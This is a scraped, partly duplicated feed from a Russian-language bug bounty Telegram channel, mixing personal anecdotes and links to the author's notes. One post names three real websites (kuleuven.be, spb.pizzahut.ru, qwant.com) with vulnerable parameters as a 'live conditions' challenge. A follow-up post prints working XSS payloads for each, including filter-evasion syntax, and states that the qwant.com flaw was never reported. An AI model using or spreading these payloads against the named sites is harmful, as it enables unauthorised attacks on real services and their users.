This media is not supported in your browser
VIEW IN TELEGRAM
У меня тут раритет.
Такое просто так не нагуглишь.
Спецназ в Афганистане.
Забытая война, никому ненужная, как и те парни.
#combatfootge
Такое просто так не нагуглишь.
Спецназ в Афганистане.
Забытая война, никому ненужная, как и те парни.
#combatfootge
👏1
Отловил stored XSS на https://business.tinkoff.ru, например.
Зарепортил.
Надеюсь, что какой-то ловкий хакер не обогнал на повороте скромного скрипткидисса.
#bb
Зарепортил.
Надеюсь, что какой-то ловкий хакер не обогнал на повороте скромного скрипткидисса.
#bb
👍3🔥1
Сегодня, по странному стечению обстоятельств, день XSS.
Мой дружаня закидал меня вопросами по XSS, поэтому предлагаю вам челлендж в боевых условиях. От легкого к сложному.
1. https://www.kuleuven.be/communicatie/php/toga/?lang= Параметр lang уязвим.
2. https://spb.pizzahut.ru/?coupon[]= Параметр coupon[] уязвим.
3. https://www.qwant.com/?r=FR&sr=fr&l=fr_ Параметр l уязвим.
Тот кто первый решит, получит от менянихуя, коуб с Паймон.
#bb
Мой дружаня закидал меня вопросами по XSS, поэтому предлагаю вам челлендж в боевых условиях. От легкого к сложному.
1. https://www.kuleuven.be/communicatie/php/toga/?lang= Параметр lang уязвим.
2. https://spb.pizzahut.ru/?coupon[]= Параметр coupon[] уязвим.
3. https://www.qwant.com/?r=FR&sr=fr&l=fr_ Параметр l уязвим.
Тот кто первый решит, получит от меня
#bb
🔥5👍1
Оглядываясь назад, решил вспомнить, с чего же я начинал.
Пролистав историю репортов в самое начало - вздохнул с облегчением. Как и любой порядочный скрипткид я вступил на кривую дорожку багхантинга с Duplicate, а потом и закономерными N/A.
Забавно, что это был ок.ru - я на нем никогда не сидел(честно), но ручки почему-то потянулись тестить туда.
Но, кажется уже тогда понимал, что self XSS это хуйня(Вот что Античат с людьми делает).
Но интерес зарепортить первый баг перевесил сомнения в целесообразности.
Такие дела.
#bb
Пролистав историю репортов в самое начало - вздохнул с облегчением. Как и любой порядочный скрипткид я вступил на кривую дорожку багхантинга с Duplicate, а потом и закономерными N/A.
Забавно, что это был ок.ru - я на нем никогда не сидел(честно), но ручки почему-то потянулись тестить туда.
Но, кажется уже тогда понимал, что self XSS это хуйня(Вот что Античат с людьми делает).
Но интерес зарепортить первый баг перевесил сомнения в целесообразности.
Такие дела.
#bb
🌭2
ScriptKiddieNotes
Сегодня, по странному стечению обстоятельств, день XSS. Мой дружаня закидал меня вопросами по XSS, поэтому предлагаю вам челлендж в боевых условиях. От легкого к сложному. 1. https://www.kuleuven.be/communicatie/php/toga/?lang= Параметр lang уязвим. 2. …
This media is not supported in your browser
VIEW IN TELEGRAM
Ну поскольку всем похуй, вот такие ответы, в моем понимании, на предыдущий пост.
1. https://www.kuleuven.be/communicatie/php/toga/?lang=1</Script/><Svg/OnLoad=(confirm)(document.domain)>
2. https://spb.pizzahut.ru/?coupon[]='-alert(1)-'
3. https://www.qwant.com/?r=FR&sr=fr&l=fr_</script><script>myObj.prop =''-alert(document.domain);var myObj='';</script>
Hint:
Домен qwant.com вроде есть на yeswehack до сих пор, так что можете срубить за XSS баксов 500$. Лично я попытался там вывести денюжки по другим репортам, но уткнулся в сложности. Поэтому даже репортить не стал.
Ну и пусть нахуй идут.
#bb
1. https://www.kuleuven.be/communicatie/php/toga/?lang=1</Script/><Svg/OnLoad=(confirm)(document.domain)>
2. https://spb.pizzahut.ru/?coupon[]='-alert(1)-'
3. https://www.qwant.com/?r=FR&sr=fr&l=fr_</script><script>myObj.prop =''-alert(document.domain);var myObj='';</script>
Hint:
Домен qwant.com вроде есть на yeswehack до сих пор, так что можете срубить за XSS баксов 500$. Лично я попытался там вывести денюжки по другим репортам, но уткнулся в сложности. Поэтому даже репортить не стал.
Ну и пусть нахуй идут.
#bb
😁5👍1
This media is not supported in your browser
VIEW IN TELEGRAM
Мои личные заметки по обходу форм загрузок c подборкой полезныx материалов.
https://raw.githubusercontent.com/lalkaltest/FU/main/README.md
#bb
https://raw.githubusercontent.com/lalkaltest/FU/main/README.md
#bb
Я не понимаю. Зачем они закидывают инвайтами, если все равно не платят. Это такой толстый троллинг?
#bb
#bb
💩3🌚1
https://github.com/lalkaltest/ATO/blob/main/README.md
Мои личные заметки по Account Takeover + частично Rate limit Bypass.
В принципе, полезно, сам частенько заглядываю туда.
Ну и да, лучше тупой карандаш, чем острая память.
#bb
Мои личные заметки по Account Takeover + частично Rate limit Bypass.
В принципе, полезно, сам частенько заглядываю туда.
Ну и да, лучше тупой карандаш, чем острая память.
#bb
🔥3👍1